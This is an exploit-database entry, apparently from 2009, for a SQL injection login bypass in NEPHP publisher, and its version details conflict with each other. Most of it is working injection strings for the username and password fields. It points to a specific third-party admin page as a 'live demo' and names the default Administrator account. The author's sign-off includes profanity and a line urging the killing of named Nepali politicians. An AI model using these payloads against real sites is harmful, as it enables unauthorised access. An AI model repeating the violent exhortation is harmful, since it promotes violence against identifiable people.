NEPHP publisher SQLi login bypass

vendor:

NEPHP publisher

by:

learn3r hacker from Nepal

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: NEPHP publisher

Affected Version From: 3.5.2009

Affected Version To: 3.5.2009

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

NEPHP publisher SQLi login bypass

A vulnerability exists in NEPHP publisher version 3.5.9 or lower, which allows an attacker to bypass the login page by using a valid username and a single quote followed by a hash (#) as the password. An attacker can also use ' or 1='1'# as the username and any password to bypass the login page. A live demo of the exploit is available at http://andhracafe.com/admin/index.php. The default username is Administrator.

Mitigation:

Upgrade to the latest version of NEPHP publisher.

Source

Exploit-DB raw data:

#############################################
#  NEPHP publisher SQLi login bypass	    #
#     By learn3r hacker from Nepal	    #
#      damagicalhacker@gmail.com	    #
#############################################

Affected version: v 3.5.9 or may be lower...

Username: valid_username'#  [eg. Administrator/*]
Password: learn3r  [or whatever]

Or
Username: ' or 1='1'#
password: learn3r [or whatever]

Live Demo: http://andhracafe.com/admin/index.php

Note that Administrator is a default username in this product

Greetz to: sToRm and m0nkee from #gny, sam207 from www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all...
FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of Nepal
K!ll Parmananda Jha, Upendra Yadav and Vijay Gachhedhaar

By learn3r aka cyb3r lord
Nepali Hackerz Are Not Dead!!!

# milw0rm.com [2009-09-17]